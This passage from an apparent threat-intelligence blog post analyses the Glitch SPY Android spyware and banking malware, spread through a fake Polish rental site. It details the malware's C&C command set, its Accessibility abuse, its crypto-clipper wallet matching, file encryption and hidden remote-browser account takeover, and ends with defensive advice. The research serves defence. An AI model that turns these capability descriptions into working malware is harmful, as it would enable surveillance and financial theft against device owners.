<li>The exposed Glitch SPY panel confirms the presence of modules such as Agents, Viewer, Builder, Cryptor, Dropper, Settings, and Payloads.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>The Builder module indicates that threat actors can generate customized Android payloads with configurable names, package IDs, icons, feature modules, decoy WebView URLs, and optional Telegram alerting.</li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Overview<strong></strong></h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><a href="https://cyble.com/resources/research-reports/">Cyble Research and Intelligence Labs</a> identified an emerging Android malware family tracked as <strong>Glitch SPY</strong>, based on branding observed on an exposed command-and-control (C&amp;C) admin panel. The <a href="https://cyble.com/knowledge-hub/what-is-malware/">malware</a> was distributed via the suspicious domain tutaj-dompl[.]com, which appears to be a Polish apartment and house rental platform.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The website advertises verified apartments, viewing reservations, direct contact with property owners, and a simplified rental process without broker commissions. Its primary objective is to encourage users to download an Android APK to reserve apartment viewings, check availability, save listings, and receive confirmation updates.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":121434,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/06/Figure-2-Fake-Tutaj-Dom-distribution-website.png" alt="" class="wp-image-121434"><figcaption class="wp-element-caption"><em>Figure 2 - Fake Tutaj Dom distribution website</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The lure is socially plausible, as users searching for rental properties may install a dedicated application to secure viewing slots or communicate with property owners. Based on the Polish-language lure and rental-themed distribution website, the activity appears to be Poland-focused, particularly targeting users searching for rental properties in Poland.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Once installed, the application displays the rental-themed website as a decoy interface, while the Glitch SPY payload runs in the background and initiates malicious activity.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>During analysis, the malware was observed communicating with the C&amp;C domain sportypointsrewards[.]com. Accessing the C&amp;C infrastructure revealed an admin login panel branded as Glitch SPY, which prompted for a username and password. We also identified an additional Glitch SPY admin panel URL gich[.]etherraffleexchange[.]us.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>However, no communicating APK associated with that second panel has been recovered at the time of analysis.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":121437,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/06/Figure-3-Glitch-SPY-admin-login-panel.png" alt="" class="wp-image-121437"><figcaption class="wp-element-caption"><em>Figure 3 - Glitch SPY admin login panel</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Before authentication, the admin panel exposed a partial view of the Glitch SPY dashboard, revealing multiple modules, including:</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":121438,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/06/Figure-4-%E2%80%93-Glitch-SPY-dashboard.png" alt="Figure 4 – Glitch SPY dashboard" class="wp-image-121438"><figcaption class="wp-element-caption"><em>Figure 4 – Glitch SPY dashboard</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>The <strong>Agents</strong> module appears to be designed to list infected devices and search for victims by name, agent ID, device details, or IP address.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>The <strong>Viewer</strong> module provides live screen viewing and remote-control operations, including remote input, pattern unlock, screen streaming, screenshots, screen-reader extraction, Android navigation controls, camera access, audio capture, keylogging, clipper operations, file management, SMS access, contacts, call logs, location tracking, installed applications, device accounts, system information, remote browser interaction, shell access, permission prompting, Device Admin control, biometric prompt suppression, app hiding, and self-uninstall functionality.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>The <strong>Builder</strong> module allows TA to configure and compile Android payloads using Gradle on the server. Configurable options include the application name, package name, launcher icon, version information, foreground notification text, decoy WebView URL, feature modules, Device Admin activation, and Telegram alert settings.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>The <strong>Cryptor</strong> module is present but marked as “Coming soon,” suggesting planned support for APK repacking, fresh signing, payload noise under assets, and mirror obfuscation layers while preserving installability.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>The <strong>Dropper</strong> module appears to allow TA to wrap a generated payload inside a separate dropper APK, supporting staged delivery.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>The <strong>Payloads</strong> module appears to store APKs generated by the Builder and Dropper modules.</li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Once the user installs the downloaded application, it functions as a dropper and presents a fake update-style screen to guide the victim through the required installation and permission steps. The dropper first attempts to convince the user to allow installation from unknown sources. After this permission is granted, the Glitch SPY payload is installed on the device.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>After installation, Glitch SPY prompts the user to enable the Android Accessibility Service. Once Accessibility access is enabled, the malware abuses this capability to automate permission grants and continue its post-installation activity with minimal user interaction.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>This allows Glitch SPY to obtain the permissions required for remote control, screen capture, keylogging, SMS theft, file access, camera and microphone surveillance, clipboard monitoring, and other intrusive operations.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>A detailed technical analysis of these capabilities is provided in the following section.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Technical Analysis</h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The application downloaded from the fraudulent website was identified as the Brokewell Android Loader, based on its package naming pattern and its use of techniques designed to circumvent Android permission restrictions. CRIL first documented the Brokewell Android Loader and the Brokewell Banking Trojan in April 2024.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>After installation, the loader presents a fake update-themed screen and prompts the user to allow installation of applications from unknown sources. Once the user grants this permission, the loader installs the Glitch SPY payload on the device.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":121441,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/06/Figure-5-Glitch-SPY-installation-activity.png" alt="" class="wp-image-121441"><figcaption class="wp-element-caption"><em>Figure 5 - Glitch SPY installation activity</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Abuse of Android Accessibility Service</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Following installation, Glitch SPY immediately attempts to obtain Android Accessibility Service access, which is required for several of its core capabilities. After the user enables the Accessibility Service, the malware abuses this permission to observe UI elements, interact with on-screen content, perform gestures, click buttons, extract visible text, and automate permission approval flows with limited user interaction.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The malware includes logic for remote tap and swipe actions, screen-reader text extraction, gesture dispatch, automated permission granting, keyguard interaction, PIN/password entry, pattern unlock assistance, biometric prompt handling, and force-stop or uninstall interruption. This makes Accessibility the primary mechanism Glitch SPY uses to support TA-driven control of the infected device and to continue post-installation activity.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Command and Control</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>After installation, Glitch SPY starts its core C&amp;C service and establishes a persistent WebSocket-based communication channel with the command-and-control server. The malware Glitch SPY refers to the device as an agent, assigns an agent_id to the infected device, collects device metadata, and sends an initial hello message along with deviceInfo to register the infected device with the C&amp;C panel. The server responds with a hello_ack, after which the implant maintains connectivity using heartbeat and ping logic.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The implant executes the requested action locally and returns the output through response messages such as command_result, screen_frame, sms_data, contacts_data, file_list, and browser_command_result.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The complete list of commands is provided below.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:table --></p>
<figure class="wp-block-table">
<table class="has-fixed-layout">
<tbody>
<tr>
<td><strong>Command</strong></td>
<td><strong>Feature</strong></td>
</tr>
<tr>
<td>request_screen_stream</td>
<td>Starts live screen streaming from the infected device to the C&amp;C panel.</td>
</tr>
<tr>
<td>stop_screen_stream</td>
<td>Stops the active screen-streaming session.</td>
</tr>
<tr>
<td>request_screenshot</td>
<td>Captures a screenshot of the infected device screen and returns it to the C&amp;C.</td>
</tr>
<tr>
<td>request_screen_reader_text</td>
<td>Uses Accessibility to extract visible on-screen text and send it to the C&amp;C Server.</td>
</tr>
<tr>
<td>request_sms</td>
<td>Collects SMS messages from the infected device.</td>
</tr>
<tr>
<td>send_sms</td>
<td>Sends an SMS message from the infected device using TA provided content.</td>
</tr>
<tr>
<td>request_contacts</td>
<td>Extracts the victim’s contact list.</td>
</tr>
<tr>
<td>request_call_log</td>
<td>Collects call history from the infected device.</td>
</tr>
<tr>
<td>request_location</td>
<td>Retrieves the device location.</td>
</tr>
<tr>
<td>request_app_list</td>
<td>Enumerates installed applications on the device.</td>
</tr>
<tr>
<td>request_device_accounts</td>
<td>Collects account information configured on the Android device.</td>
</tr>
<tr>
<td>request_system_info</td>
<td>Collects device metadata</td>
</tr>
<tr>
<td>request_file_list</td>
<td>Lists files and folders from a specified path on the device.</td>
</tr>
<tr>
<td>request_file_download</td>
<td>Downloads a selected file from the infected device to the C&amp;C.</td>
</tr>
<tr>
<td>request_folder_zip_download</td>
<td>Compresses a folder and prepares it for download</td>
</tr>
<tr>
<td>file_upload_start</td>
<td>Starts a file upload session.</td>
</tr>
<tr>
<td>file_upload_chunk</td>
<td>Transfers a chunk of a file being uploaded to the infected device.</td>
</tr>
<tr>
<td>file_upload_finish</td>
<td>Finalizes the file upload operation on the device.</td>
</tr>
<tr>
<td>file_upload_cancel</td>
<td>Cancels an active file upload session.</td>
</tr>
<tr>
<td>file_mkdir</td>
<td>Creates a new directory on the infected device.</td>
</tr>
<tr>
<td>file_rename</td>
<td>Renames a selected file or folder on the device.</td>
</tr>
<tr>
<td>file_run</td>
<td>Opens or executes a selected file on the infected device.</td>
</tr>
<tr>
<td>file_zip_here</td>
<td>Creates a ZIP archive next to the selected folder on the device.</td>
</tr>
<tr>
<td>file_crypto_lock</td>
<td>Encrypts a selected file, likely producing a .enc file and removing the original.</td>
</tr>
<tr>
<td>file_crypto_unlock</td>
<td>Decrypts a previously encrypted .enc file.</td>
</tr>
<tr>
<td>request_offline_keylog</td>
<td>Retrieves offline keylog data from the device.</td>
</tr>
<tr>
<td>start_keylogger</td>
<td>Starts keylogging</td>
</tr>
<tr>
<td>stop_keylogger</td>
<td>Stops the active keylogging module.</td>
</tr>
<tr>
<td>request_camera_stream</td>
<td>Starts camera streaming from the infected device.</td>
</tr>
<tr>
<td>stop_camera_stream</td>
<td>Stops the active camera stream.</td>
</tr>
<tr>
<td>start_audio</td>
<td>Starts audio capture from the infected device.</td>
</tr>
<tr>
<td>stop_audio</td>
<td>Stops audio capture.</td>
</tr>
<tr>
<td>start_clipboard_monitor</td>
<td>Starts monitoring the device clipboard.</td>
</tr>
<tr>
<td>stop_clipboard_monitor</td>
<td>Stops clipboard monitoring.</td>
</tr>
<tr>
<td>clipper_get_config</td>
<td>Retrieves the current crypto-clipper configuration from the device.</td>
</tr>
<tr>
<td>clipper_set_config</td>
<td>Pushes or updates clipper rules, likely including wallet replacement addresses.</td>
</tr>
<tr>
<td>clipper_inject_clipboard</td>
<td>Forces/injects clipboard content on the victim device.</td>
</tr>
<tr>
<td>execute_command</td>
<td>Executes a TA-provided shell command on the infected device.</td>
</tr>
<tr>
<td>remote_browser_start</td>
<td>Starts a remote browser session on the infected device.</td>
</tr>
<tr>
<td>remote_browser_stop</td>
<td>Stops the remote browser session.</td>
</tr>
<tr>
<td>remote_browser_navigate</td>
<td>Navigates the remote browser to a supplied URL.</td>
</tr>
<tr>
<td>remote_browser_click</td>
<td>Performs a click action inside the remote browser session.</td>
</tr>
<tr>
<td>remote_browser_text</td>
<td>Enter the TA-provided text into the remote browser.</td>
</tr>
<tr>
<td>remote_browser_swipe</td>
<td>Performs a swipe gesture inside the remote browser session.</td>
</tr>
<tr>
<td>remote_browser_key</td>
<td>Sends keyboard key actions to the remote browser, such as Enter, Backspace, Tab, or arrow keys.</td>
</tr>
<tr>
<td>remote_browser_js_fill</td>
<td>Fills fields in the remote browser using JavaScript-style automation.</td>
</tr>
<tr>
<td>remote_browser_clear_field</td>
<td>Clears a selected input field in the remote browser.</td>
</tr>
<tr>
<td>remote_browser_action</td>
<td>Performs a generic browser-side action, likely used for submit, back, reload, or similar UI actions.</td>
</tr>
<tr>
<td>remote_browser_set_mode</td>
<td>Switches the remote browser view mode, such as desktop/mobile mode.</td>
</tr>
<tr>
<td>remote_browser_fps</td>
<td>Adjusts the remote browser streaming or update frame rate.</td>
</tr>
<tr>
<td>tap_ui_submit</td>
<td>Attempts to tap a visible submit/OK/Done button or sends Enter to submit the current UI.</td>
</tr>
<tr>
<td>pattern_fetch</td>
<td>Retrieves a stored Android unlock pattern from the malware/device-side store.</td>
</tr>
<tr>
<td>pattern_store</td>
<td>Saves a TA-provided Android unlock pattern for later reuse.</td>
</tr>
<tr>
<td>pattern_clear_store</td>
<td>Clears the saved unlock pattern from storage.</td>
</tr>
<tr>
<td>pattern_auto_unlock</td>
<td>Uses a saved or provided pattern to attempt automatic device unlock.</td>
</tr>
<tr>
<td>credential_fetch</td>
<td>Retrieves a stored PIN/password credential value or credential state.</td>
</tr>
<tr>
<td>credential_manual_save</td>
<td>Saves a PIN/password credential provided by the TA on the device side.</td>
</tr>
<tr>
<td>credential_manual_save_unlock</td>
<td>Saves a supplied credential and immediately attempts to unlock the device with it.</td>
</tr>
<tr>
<td>credential_auto_unlock</td>
<td>Attempts to unlock the device automatically using a previously captured or saved credential.</td>
</tr>
<tr>
<td>credential_clear</td>
<td>Clears the stored PIN/password credentials from the malware’s storage.</td>
</tr>
<tr>
<td>prompt_permission_notifications</td>
<td>Opens or triggers the Android notification permission flow.</td>
</tr>
<tr>
<td>prompt_permission_storage</td>
<td>Opens or triggers the storage permission flow.</td>
</tr>
<tr>
<td>prompt_permission_location</td>
<td>Opens or triggers the location permission flow.</td>
</tr>
<tr>
<td>prompt_permission_battery</td>
<td>Opens the battery optimization exemption flow.</td>
</tr>
<tr>
<td>prompt_permission_all_files</td>
<td>Opens the “All files access” permission screen.</td>
</tr>
<tr>
<td>activate_device_admin</td>
<td>Launches or triggers Device Admin activation for the malware.</td>
</tr>
<tr>
<td>deactivate_device_admin</td>
<td>Attempts to remove Device Admin rights from the malware.</td>
</tr>
<tr>
<td>block_biometric</td>
<td>Enables/disables biometric prompt suppression to force PIN/password fallback.</td>
</tr>
<tr>
<td>wake_screen</td>
<td>Wake the victim's device screen.</td>
</tr>
<tr>
<td>lock_device</td>
<td>Locks the device screen</td>
</tr>
<tr>
<td>hide_screen</td>
<td>Hides the visible device screen from the victim's side</td>
</tr>
<tr>
<td>hide_app</td>
<td>Hides the malware application icon or disables its launcher component.</td>
</tr>
<tr>
<td>show_app</td>
<td>Restores the malware application launcher component.</td>
</tr>
<tr>
<td>self_uninstall</td>
<td>Attempts to uninstall the malware from the device.</td>
</tr>
<tr>
<td>uninstall_app</td>
<td>Attempts to uninstall a specified application from the device.</td>
</tr>
</tbody>
</table>
</figure>
<p><!-- /wp:table --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Screen Capture and Live Streaming</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Glitch SPY can remotely view the victim’s screen and interact with the device in near real time.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>When the TA issues the request_screen_stream command from the C&amp;C panel, the malware initiates its screen capture module and begins sending screen frames back to the server as screen_frame messages.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The TA’s panel includes options to control stream quality, FPS, and scale, indicating that the stream can be adjusted based on device state and network conditions.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":121445,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/06/Figure-6-%E2%80%93-Screen-capture-Activity.png" alt="" class="wp-image-121445"><figcaption class="wp-element-caption"><em>Figure 6 – Screen capture Activity</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>For a one-time capture, the TA can use request_screenshot, which instructs the malware to capture the device's screen and return the image to the C&amp;C. When visual streaming is unavailable or insufficient, the user can use request_screen_reader_text, which abuses the Android Accessibility Service to extract visible text from the active screen.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>This allows the malware to collect sensitive information displayed in banking applications, <a href="https://cyble.com/knowledge-hub/top-secure-messaging-apps-encrypted-chats/">messaging apps</a>, OTP prompts, browser pages, and authentication screens.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>In addition to visual monitoring, this capability supports hands-on fraud activity. By combining live screen streaming with Accessibility-based remote input, the TA can observe the victim’s device, understand the active application context, and perform follow-up actions such as tapping buttons, entering text, navigating screens, or capturing credentials.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>File Manager and File Encryption</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Glitch SPY includes a remote file manager that allows the TA to browse, retrieve, modify, and manipulate files on the infected device. When the TA sends request_file_list, the malware lists files and folders from the requested directory and returns the results to the C&amp;C as a file listing.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>If the TA selects a file for exfiltration, the malware reads it and sends it back to the server. For folders, the malware compresses the selected directory before exfiltration, making it easier for the TA to retrieve multiple files.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Glitch SPY also includes file encryption and decryption functionality through the file_crypto_lock and file_crypto_unlock commands. When file_crypto_lock is issued, the malware encrypts the selected file using AES/GCM/NoPadding, creates an encrypted .enc version, and removes the original plaintext file.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The encrypted file uses the FMENC1 header followed by cryptographic metadata and ciphertext. If standard deletion of the plaintext file fails, the malware uses a secure-delete routine that overwrites the file with random data, truncates it, syncs the file descriptor, and then attempts to delete it.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":121447,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/06/Figure-7-%E2%80%93-File-encryption-logic.png" alt="" class="wp-image-121447"><figcaption class="wp-element-caption"><em>Figure 7 – File encryption logic</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Although file encryption could be abused for extortion, the analyzed sample does not confirm an automated mass-encryption routine, ransom note, payment workflow, or victim-facing ransom screen.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Crypto Clipper Functionality</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The crypto-clipper module is designed to monitor clipboard activity on the infected device and replace copied <a href="https://cyble.com/blog/cryptocurrency-firms-being-raided-by-cybercriminals/">cryptocurrency</a> wallet addresses with TA-configured addresses.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The module supports multiple wallet formats, including ETH/EVM addresses beginning with 0x, TRON/TRX addresses beginning with T, Bitcoin legacy addresses beginning with 1 or 3, and Bitcoin Bech32 addresses beginning with bc1q or bc1p. The code also includes URI-style prefixes such as bitcoin:, ethereum:, erc20:, tron:, bsc:, matic:, polygon:, arbitrum:, optimism:, base:, and ton:, indicating that the malware can detect wallet addresses copied in both plain-text and URI-prefixed formats.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":121453,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/06/Figure-8-%E2%80%93-Malware-implemented-crypto-wallet-address-pattern-match.png" alt="Figure 8 – Malware implemented crypto wallet address pattern match" class="wp-image-121453"><figcaption class="wp-element-caption"><em>Figure 8 – Malware implemented crypto wallet address pattern match</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>When the TA issues the start_clipboard_monitor command, Glitch SPY begins tracking clipboard changes on the infected device. Before performing any replacement, the clipper module is enabled in the configuration.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>If replacement is active, the malware reads the current clipboard content, extracts text from available clipboard items, removes null bytes and hidden formatting characters, normalizes whitespace, and attempts to identify a supported cryptocurrency wallet address.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>If a valid wallet address is detected, Glitch SPY selects a configured replacement address from the same cryptocurrency family and ensures it is different from the victim-copied address. It then updates the clipboard using Android’s ClipboardManager.setPrimaryClip() API, replacing the victim’s original wallet address with the attacker-controlled value.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>After the replacement, the malware reports the event to the C&amp;C server, including the original address, replacement address, and detected cryptocurrency type, such as ETH/EVM, TRX, or BTC.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":121454,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/06/Figure-9-Crypto-clipper-clipboard-replacement-logic.png" alt="" class="wp-image-121454"><figcaption class="wp-element-caption"><em>Figure 9 - Crypto clipper clipboard replacement logic</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Remote Browser Capability</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Glitch SPY’s remote browser capability allows the TA to open and control a browser session directly on the infected device. The malware receives a URL from the C&amp;C server and loads it inside a WebView on the victim’s device. It also supports switching between mobile and desktop browsing modes, allowing the TA to control how websites render during the session.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The browser session runs in a hidden off-screen window, keeping it active without alerting the victim. After the browser session is initialized, the malware reports the session status, loaded URL, browsing mode, and window details back to the C&amp;C server. This allows the TA to confirm that the browser session is active and ready for interaction.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":121455,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/06/Figure-10-Remote-browser-activity.png" alt="" class="wp-image-121455"><figcaption class="wp-element-caption"><em>Figure 10 - Remote browser activity</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The TA can further control the session using commands to navigate to URLs, click page elements, enter text, swipe through pages, send keyboard actions, and fill or clear web form fields.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>When combined with screen streaming, keylogging, screen-reader extraction, clipboard monitoring, and Accessibility-based input, the remote browser capability provides a complete workflow for web-based account takeover and transaction manipulation from the infected device itself.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":121457,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/06/Figure-11-%E2%80%93-Commands-to-control-WebView-sessions.png" alt="" class="wp-image-121457"><figcaption class="wp-element-caption"><em>Figure 11 – Commands to control WebView sessions</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The feature can let attacker-controlled web activity originate from the victim’s own device rather than from external attacker infrastructure.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>This means the attacker's web activity originates from the victim's IP, with the victim's cookies and any active authenticated sessions intact — making it harder for banks or crypto platforms to flag the login as suspicious.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>In fraud scenarios, this may allow attackers to interact with login pages, financial portals, cryptocurrency services, email accounts, or other web applications from the victim’s environment.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Conclusion</h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Glitch SPY is a capable, actively developing Android threat combining surveillance, remote control, financial fraud, and account takeover within a single platform.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Its use of the established Brokewell loader for delivery, its abuse of the Accessibility Service to automate permission grants after a single user action, and its Builder, Dropper, and payload-management modules indicate a TA investing in a reusable framework rather than a one-off campaign.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The Builder's per-payload configuration options (custom name, icon, package ID, and decoy WebView URL) mean retargeting for a new region or lure requires no code changes.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>While the current activity appears targeted at users searching for rental properties in Poland, one recovered APK and two identified C&amp;C panel URLs suggest early-stage distribution. The "Coming soon" Cryptor module and active panel development indicate the platform is still expanding.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Users should avoid installing APKs from outside official app stores. The loader's first action is requesting permission to install from unknown sources; denying it stops the payload before it installs.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Any app that requests Accessibility Service or installs from unknown sources should be treated as suspicious. Keep Google Play Protect enabled.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Our Recommendations</h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>We have listed some essential <a href="https://cyble.com/knowledge-hub/what-is-cybersecurity/">cybersecurity</a> best practices that serve as the first line of defense against attackers. We recommend that our readers follow the best practices given below:</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
